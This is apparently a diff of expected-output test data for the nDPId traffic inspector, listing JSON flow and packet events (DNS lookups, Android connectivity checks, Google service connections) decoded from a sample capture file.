-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1490976023731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1490976024793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1490976024793,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWklAAEARM1+sECrYrBAqAQ1wADUAN5pbXVABAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAE="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1490976024844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1490976024844,"pkt":"ePiC0\/vCAMDKkaPvCABFAABnz+xAAEARvZ+sECoBrBAq2AA1DXAAU9tZXVCBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAHADAAcAAEAAAErABAmB\/iwQAAIEwAAAAAAACAO"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1490976024847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1490976024847,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWkpAAEARM16sECrYrBAqAdlDADUAN19T54QBAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAE="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1490976024848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1490976024848,"pkt":"ePiC0\/vCAMDKkaPvCABFAABbz+1AAEARvaqsECoBrBAq2AA12UMAR0w654SBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAHADAABAAEAAAEYAASs2QmO"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1490976027514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976027514,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WktAAEARM2qsECrYrBAqAc\/EADUAKrjvz8MBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1490976027522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027522,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WkxAAEARM2usECrYrBAqAc17ADUAKKL+U00BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1490976027523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027523,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NFAAEARvNWsECoBrBAq2AA1zXsAOK5EU02BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1490976027560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976027560,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr0NVAAEARvLKsECoBrBAq2AA1z8QAV0oUz8OBgAABAAIAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAUAAQABUX8AEQxtb2JpbGUtZ3RhbGsBbMASwC4AAQABAAABKwAErcLfvA=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} 